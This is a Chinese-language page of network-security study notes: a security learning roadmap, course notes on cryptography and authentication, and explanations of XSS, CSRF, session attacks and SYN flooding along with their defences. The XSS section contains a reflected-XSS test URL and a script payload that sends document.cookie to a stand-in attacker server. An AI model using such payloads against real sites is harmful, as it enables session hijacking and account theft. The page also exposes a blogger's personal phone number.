    ---------------------------------实战-----------------------------------

    靶机:dvwa

    网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)

    靶机:sqlilabs

    sqlmap实战之sqlilabs-Less1

    Less2差不多,整型参数错误,sql语句为 SELECT * FROM users WHERE id=$id LIMIT 0,1

    网络安全-sqlmap实战之sqlilabs-Less3

    网络安全-sqlmap实战之sqlilabs-Less4

    网络安全-sqlmap实战之sqlilabs-Less5

    网络安全-sqlmap实战之sqlilabs-Less6

    网络安全-sqlmap实战之sqlilabs-Less8

    网络安全-sqlmap实战之sqlilabs-Less9

    网络安全-sqlmap实战之sqlilabs-Less11

    网络安全-sqlmap实战之sqlilabs-Less12

    网络安全-sqlmap实战之sqlilabs-Less13

    反序列化漏洞

    ----------------------------------理论与实战--------------------------------------

    网络安全-反序列化漏洞简介、攻击与防御

    条件竞争

    网络安全-条件竞争(《CTF特训营》第7章复现)

    CTF-【NSCTF 2015】WEB11 条件竞争

    通信安全

    ----------------------------------理论与实战--------------------------------------

    应用层

    网络-http协议学习笔记(消息结构、请求方法、状态码等)

    网络-https协议学习笔记(SSL、TLS、CA、抓包与修改)

    网络-Telnet协议与SSH协议(命令、免密登录)及其安全性

    网络-DNS域名系统详解与DNS攻击

    传输层

    网络-UDP协议详解(代码、实战)

    网络-TCP协议详解自学笔记(例题、代码、实战)

    网络层

    网络-IP协议详解(报文格式、分类、NAT、子网、CIDR、抓包分析)

    网络-ICMP协议、Ping命令实现与ICMP攻击

    网络-ARP协议详解与ARP欺骗(中毒)攻击实战

    -----------------------------------实战-------------------------------------

    网络安全-scapy学习笔记

    网络安全-python脚本资源整理

    身份认证与访问控制

    弱口令爆破

    ----------------------------------理论----------------------------------

    github 字典整理

    渗透测试

    学习路线

    学习路线

    时间关系,仅关注渗透测试基础与WEB渗透相关的内容。

    基础知识

    kali

    渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)

    推荐

    书籍

    《Metasploit渗透测试魔鬼训练营》

    《Metasploit渗透测试指南》

    《KALI渗透测试技术实战》

    练习靶场

    hackthebox

    vulnhub

    信息收集

      网络安全-信息收集

    《MetaSploit渗透测试魔鬼训练营》之环境搭建

    《MetaSploit渗透测试魔鬼训练营》之信息搜集

    漏洞扫描

    OpenVAS的安装、使用及实战(GVM,Metasploit使用)

    渗透攻击

    《MetaSploit渗透测试魔鬼训练营》之WEB应用渗透技术

    现代密码学

    没想到半年了,文章更新到这么长了,思维导图就不放在这个里面了,放在下面概论里面了

    基本知识

    现代密码学-密码学概论与基本知识

    传统密码

    对称密码

    非对称密码

    哈希函数与消息认证

    数字签名

    公钥管理

    数字帧数

    CTF

    项目推荐

    CTF入门

    CTF工具

    CTF工具2

    比赛推荐

    全国大学生信息安全竞赛

    DDCTF

    "强网杯"全国网络安全挑战赛

    网鼎杯网络安全大赛

    XCTF

    WCTF

    TCTF

    NSCTF

    KCTF

    模糊测试

    AFL

    模糊测试-AFL学习笔记之C/C++

    模糊测试-AFL学习笔记之Java

    文件模糊测试

    模糊测试-radamsa学习笔记

    插桩

    java插桩

    java插桩-javaassist

    java插桩-Jacoco java代码覆盖率可视化

    本人b站账号:lady_killer9

    喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

    展开全文
  • 网络安全笔记

    千次阅读 2018-12-28 14:55:28
    课程路径:华南理工大学公开课:网络安全 网络安全将是未来的基石,万物互联的基础保障。 第一节 现状分析 病毒,变种病毒; 漏洞攻击,技术人员的后门导致; 假网址; 中断,截获,篡改,伪造 被动攻击和主动攻击 ...


    课程路径:华南理工大学公开课:网络安全
    网络安全将是未来的基石,万物互联的基础保障。

    第一节 现状分析

    1. 病毒,变种病毒;
    2. 漏洞攻击,技术人员的后门导致;
    3. 假网址;
    4. 中断,截获,篡改,伪造
    5. 被动攻击和主动攻击
    6. 安全服务:保密,认证,完整,不可否认
    7. 安全框架:安全攻击,安全服务,安全机制

    第二节 常规加密技术

    1. 公钥密码学
    2. 加密操作类型:代换,置换,多重加密
    3. 单密钥算法和多密钥算法
    4. 对称加密:发送方和接收方使用同一个密钥;截获信息越多越容易破解,密钥越长越难被破解

    第三节 公开密码学

    1. 密钥分配
    2. 数字签名
    3. 公钥加密算法:两个密钥:一公一私;不对称;比对称加密,速度慢100倍
    4. 公钥加密:先签名私钥签名,再对方密钥加密
    5. 公钥加密解密的算法:RSA算法

    第四节 数字签名和认证

    1. 消息认证:认证函数
    2. 认证函数:消息加密函数,消息认证码,散列函数(MD5)
    3. 数字签名:作者,日期时间,内容,第三方认证
    4. 数字签名特性:唯一性,容易识别,计算上不可行
    5. Kerberos认证:认证->授权->使用
    6. X.509:证书(CA)

    第五节 网络攻防技术

    1. 物理门禁
    2. 防火墙
    3. IDS/IPS
    4. VDS/VPS
    5. VPN
    6. 隔离网闸
    展开全文
  • 网络安全学习笔记

    千次阅读 2016-03-05 00:46:47
    Server需要不断重发直至超时,这些伪造的SYN包将产时间占用未连接队列,导致正常的SYN请求因为队列满而被丢弃,从而引起网络堵塞甚至系统瘫痪    其中SYN Cookie是对抗SYN flood的主要措施之一,它的主要...

     跨站脚本攻击(XSS Cross Site Script)

        一、定义:黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户游览网页时,控制用户游览器攻击的一种行为。
        二、分类:
        1.    反射性XSS:把用户输入的数据反射给游览器(诱使用户“点击”一个恶意的链接)篡改链接->用户访问->跳转执行脚本
    <?php
    echo $_GET["test"];
    ?>
    用户提交:ip?test=<script>alert("test")</script>。游览器即会执行相应的脚本

        2. 存储型XSS:把用户输入的数据“存储”在服务器端。如黑客上传含有恶意Js代码的博客文章到网站服务器,访客游览网页博客时,在他们的游览器中恶意执行这段代码
        3. DOM Base XSS:通过修改网页DOM节点形成的XSS。当网站通过表单让用户输入内容而实现动态修改网页DOM节点的交互功能时,若黑客恶意构造特定格式脚本内容,就可能造成DOM Base XSS。
        三、危害
        1. XSS可实现cookie劫持:攻击者可直接利用注入的js脚本获取cookie,进而通过异步请求把标识session id的cookie上报给攻击者。
    比如可以在网站上嵌入<script>window.open('hackerSever?msg='+document.cookie)</script>。将用户cookie发送至攻击者的服务器,服务器获取用户cookie,攻击者即可利用其登录到用户账户中。
        2. 通过模拟GET、POST请求操作用户的游览器。如在用户登录邮箱后获取其邮件信息。(先通过正常抓包获取相应访问链接及其请求内容,再通过模拟请求获取)
        3. XSS钓鱼
        (1)XSS重定向钓鱼(XSS Redirect Phishing):将当前页面重定向到仿冒正常网站的页面中,进行欺诈活动
        (2)HTML注入式钓鱼(XSS HTML Inject Phishing):如动态嵌入一个Form表单,诱使用户填写相应信息进行盗取
        (3)XSS 跨框架钓鱼(Iframe Phishing):通过<Iframe>标签嵌入远程域的一个页面实施钓鱼。,而此时主页面依然处在正常网站的域名下,因此具有很高的迷惑性。
        四、XSS的防御
        1. 设置HttpOnly->防御Cookie劫持攻击,如果Cookie设置了HttpOnly,JS就读取不到Cookie的值。HttpOnly在服务器第一次返回发送Set-Cookie时(同时向客户端游览器写入Cookie)标记,它可以选择性地加在任何一个Cookie上
    <?php
        header("Set-Cookie : cookie1;")
        header("Set-Cookie : cookie1;httponly", false);
    ?>
    <script>
        alert(document.cookie);
    </script>
        2.输入检查(XSS Filter):如对特殊符号进行转义,特殊语句进行检查过滤等。尤其对于富文本(用户提交一些自定义的HTML代码)“事件“应该被严格禁止,同时也应包括一些比较危险的标签如<iframe>、<script>、<base>、<form>等。

    跨站点请求伪造(CSRF Cross Site Request Forgery)

       一、 定义:攻击者盗用用户身份,并以用户身份发送恶意请求。CSRF攻击是源于WEB的隐式身份验证机制。WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的。一般来说,完成一次攻击需经过两步
    1.登录受信任网站A,并在本地生成Cookie
    2.在不登出A的情况下,访问危险网站B
        二、CSRF的防御
        1. 服务与客户端交互进行CSRF防御:先构造third-party Cookie。同时在表单中增加经过hashing的cookie值随表单提交发送到服务器,在服务器获取cookie和表单加密Cookie进行hash校验。
        2. 验证码校验,用户每次提交请求需填写一个图片上的随机字符串,理论上可以完全解决CSRF的问题
        3. One-Time Tokens(不同的表单包含一个不同的伪随机值),实现思路:
            (1)编写token生成函数
            (2)在每次生成表单时,调用token生成函数,增添隐藏域存储token,考虑到不同的表单包含一个不同的伪随机值,还需同时生成访问对应token的索引
            (3)服务端核对token,表单提交时,服务端根据提交的索引获取Session域对应token,与提交的token进行核对。

    注入攻击与Session认证

       一、 注入攻击的本质,是把用户输入的数据当做代码执行。其中有两个关键点:
            1、用户能够控制输入。
            2、原本程序要执行的代码,平走了用户输入的数据
        二、Session安全
            当用户登录认证后,在服务器端就会创建一个新的会话(Session),会话中保存用户的状态和相关信息,同时生成一个游览器端对用户透明的凭证,即为SessionID
            1、Session劫持:黑客通过窃取用户SessionID后,使用该SessionID登录进目标用户。
            2、Session Fixation攻击:用户登录前后的SessionID未发生改变,就会存在此问题。具体的攻击过程为:攻击者先获取一个未认证的SessionID,并将其交给用户认证,若用户认证后,服务器并未更新此SessionID的值,攻击者就可以凭借此SessionID登录用户账户。如果SessionId保存在Cookie中,攻击者较难让用户使用这个SessionID,但如果由于youlan游览器不支持Cookie等原因,SessionID做为参数出现在URL时,攻击者只要诱使用户打开特定URL即可。而解决Session Fixation的正确做法,是在登录完成后,重写SessionID
            3、Session保持攻击,一般来说,Session是有生命周期的,当用户长时间未活动,或者注销用户后,用户Session将会被销毁。但如果攻击者窃取并一直持有用户有效的Session(比如间隔性的刷新网页),就能一直使用用户的账户,形成Session保持攻击。

    应用层拒绝服务攻击(DDOS Distributed Denial of Service)

    拒绝服务攻击以消耗服务器端资源为目的,构造大量请求数据想服务器端发送请求。

    在Sever收到SYN,seq后,处于半连接状态,发送数据包并等待Client回应,由于Client在短时间内伪造大量不存在的IP地址,并向Server不断地发送SYN包,Server回复确认包,并等待Client的确认,由于源地址是不存在的,因此,Server需要不断重发直至超时,这些伪造的SYN包将产时间占用未连接队列,导致正常的SYN请求因为队列满而被丢弃,从而引起网络堵塞甚至系统瘫痪

         其中SYN Cookie是对抗SYN flood的主要措施之一,它的主要思想是为每一个IP地址分配一个"cookie",并统计每个IP地址的访问频率。如果在短时间内收到大量来自同一个IP地址的数据包,则认为受到攻击,之后来自这个IP地址的包将被丢弃。

    分布反射式拒绝服务(DRDOS)

    攻击流程如下所示:

    黑客伪造受害者id
    ->向大量服务器发送请求
    ->大量服务器响应请求(发送应答包)
    ->受害者主机忙于处理







    展开全文
  • 小白的网络安全数据可视化笔记网络安全数据可视化网络安全数据可视化综述一、网络安全数据介绍二,数据可视化的研究方向是什么1、网络监控2、异常检测3、特征分析4、关联分析大规模网络安全数据协同可视分析方法研究...
  • 网络安全的学习笔记

    千次阅读 2020-05-27 15:41:26
    网络改变我们的生活,它使我们交流沟通更加便捷,信息资源共享更加广泛,娱乐更加丰富,日常生活更加便捷,但是网络安全也存在很大威胁,每年发现的漏洞数量增加,黑客职业化等都给我们的生活带来一系列的困扰。...
  • 网络安全系列之培训笔记整理

    千次阅读 2019-10-20 14:39:43
    从例子看并没有看出什么,可是对于专业安全人员来说,什么程序就是一个很典型的竞争条件。分析一下,首先上传文件之前会进行权限校验,然后才可以上传,在校验权限直接 存在一个时间差 ,在这个时间差直接就可以形成...
  • B站 - 黑客攻防 入门到入狱 [网络安全] -笔记

    万次阅读 多人点赞 2020-06-18 16:12:13
    安全模式下,上传任意类型文件,文件不大限制 实验二: 中安全模式下,绕过类型上传文件(文件MIME类型) 修改浏览器代理为BurpSuite的代理 通过BurpSuite修改Content-Type的信息,改为 image/JPEG 实验二实现原理...
  • 防火墙的定义:一款具备安全防护功能的网络设备 隔离网络: 将需要保护的网络与不可信任网络进行隔离,隐藏信息并进行安全防护 防火墙的基本功能: 访问控制 攻击防护 冗余设计 路由、交换 日志记录 虚拟...
  • PKI 1、PKI概述 2、信息安全三要素 3、哪些IT领域用到PKI: 4、公钥加密技术 5、数字签名: 6、证书:
  • 2020全年小迪网络安全笔记(目录)

    千次阅读 2021-06-09 16:21:45
    2020小迪网络安全 课程体系/目录: 2020上半年70天 基础入门…第1天 信息收集…第2-3天 漏洞分类…第4天 漏洞发现…第5天 漏洞利用…第6-28天 安全开发…第29-38天 代码审计…第39-43天 权限提升…第44-50天 内网...
  • 章节概述 本章节涉及到所有的网络层,因为每个网络层都可能会有漏洞被黑客利用。网络安全的目的就是对付各种各样的网络威胁...网络安全最关键的部分是建立威胁模型,描述威胁的原理以及攻击者能利用威胁做什么
  • DHCP部署与安全 1、DHCP作用 2、DHCP相关概念 3、DHCP优点 4、DHCP原理 5、DHCP续约 6、部署DHCP服务器 7、地址保留 8、选项优先级 9、DHCP备份 11、DHCP 攻击与防御 DNS部署与安全 1、DNS 2、域名组成...
  • 接下来系统分享一些网络安全的自学笔记,希望读者们喜欢。 上一篇文章分享了看雪Web安全总结知识和一个异或解密的示例,本篇文章着重讲解Chrome浏览器保留密码功能渗透解析及登录加密入门笔记,结合实际例子一步步...
  • 计算机网络学习笔记(七):网络安全

    万次阅读 多人点赞 2018-03-04 11:44:26
    网络安全基本内容 安全包括哪些方面 操作系统内部的安全包括:数据存储安全、应用程序安全、操作系统安全。 此外还有网络安全、物理安全、用户安全教育。 本章重点介绍网络安全,即数据在传输过程中的安全。 ...
  • 网络安全基础学习笔记1——密码学

    千次阅读 2018-02-03 16:44:56
    网络安全基础学习笔记1——密码学 相关概念 明文:变换前的原始信息 密文:变换后的信息 密码:用于改变信息的额替换或变换算法 密钥:用于密码变换的,只有发送者或接收者拥有的秘密消息。 编码:明文→密文 ...
  • 往期博客: [网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记) [网络安全学习篇2]:IP详解及简单的DOS命令(千峰网络安全视频笔记 2 day)(本篇) 下篇博文: ...
  • 往期博客: [网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记) [网络安全学习篇2]:IP详解及简单的DOS命令(千峰网络安全视频笔记 2 day) [网络安全学习篇3]:...
  • 网络安全培训笔记 (高清大图)

    千次阅读 2015-11-09 12:15:49
    2015年9月12至18日,我与葛老师在清华大学信息化技术中心接受网络安全 (攻击?一笑)培训。我做了25页笔记,发在微信上。有不少同学希望看到高清大图。这就是了。 这是800像素的,更清晰的发网上我担心各位流量...
  • (2020上半年第2天)小迪网络安全笔记
  • 6 day) [网络安全学习篇7]:域(千峰网络安全视频笔记 7 day) [网络安全学习篇8]:PKI(千峰网络安全视频笔记 8 day) [网络安全学习篇9]:渗透测试(千峰网络安全视频笔记 9 day)(本篇) 下期博文: [网络安全...
  • NTFS安全权限 一、NTFS权限概述 1、通过设置NTFS,实现不同用户访问不同对象(文件,文件夹)的权限 2、分配了正确访问权限后,用户才能访问不同的权限 3、设置权限防止资源被篡改、删除 二、文件系统概述 文件...
  • 网络安全传输(读书笔记

    千次阅读 2014-01-06 09:56:25
    来确认用户访问的是安全的服务器。从一个需要验证的服务器请求资源,过程如下:  当服务器收到请求,响应发出HTTP 状态码401,报头: WWW-Authenticate , NSURLConnection接收到后,告知APP调用 ...
  • 密码学学习笔记【1】——计算机与网络安全概念密码与算法协议计算机安全的概念CIA三元组真实性可追溯性OSI安全架构安全攻击被动攻击主动攻击安全服务认证访问控制数据保密性数据完整性不可否认性安全机制特定安全...
  • CISSP复习笔记-第6章 通信与网络安全

    千次阅读 2016-12-12 00:39:20
    CISSP复习笔记-第6章 通信与网络安全6.2 开放系统互联(Open System Interconnect,OSI)参考模型6.2.9 OSI模型中的功能和协议1. 应用层 文件传输协议(File Transfer Protocol,FTP) 普通文件传输协议(Trivial ...
  • 2、安装VMtools 安装VMtools,跟着提示不断下一步 3、磁盘分区管理 右键我的电脑–>管理–>磁盘管理–>右键未指派的30G 下一步,完成即可 4、关闭自动更新、防火墙 控制面板–>安全中心–>Windows防火墙 控制面板–>...
  • 千峰教育网络安全笔记day01-软件安装 文章目录*千峰教育网络安全笔记day01-软件安装*引言:小编也是初创博客经验不足,关于这套课程的大部分知识点也是初次接触,笔记在某些方面可能存在不完整,欠缺的地方,希望...
  • [网络安全学习篇20]:vpen qf网络安全视频笔记 20 day

    千次阅读 热门讨论 2020-04-10 14:45:46
    6 day) [网络安全学习篇7]:域(千峰网络安全视频笔记 7 day) [网络安全学习篇8]:PKI(千峰网络安全视频笔记 8 day) [网络安全学习篇9]:渗透测试(千峰网络安全视频笔记 9 day) [网络安全学习篇10]:扫描技术...
  • 这是我听我的老师讲课时记录的笔记,未经过整理,我会在发出来之后进行编辑 这个
  • 网络信息安全学习笔记之概论

    千次阅读 2018-09-08 17:56:14
    OSI安全框架 该框架主要关注安全攻击,安全机制,和安全服务 安全攻击:任何危机系统安全的行为 安全机制:用来检测,阻止攻击或者从攻击状态恢复到正常状态的过程或实现该过程的设备 安全服务:加强数据处理...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 114,251
精华内容 45,700
关键字:

网络安全安全笔记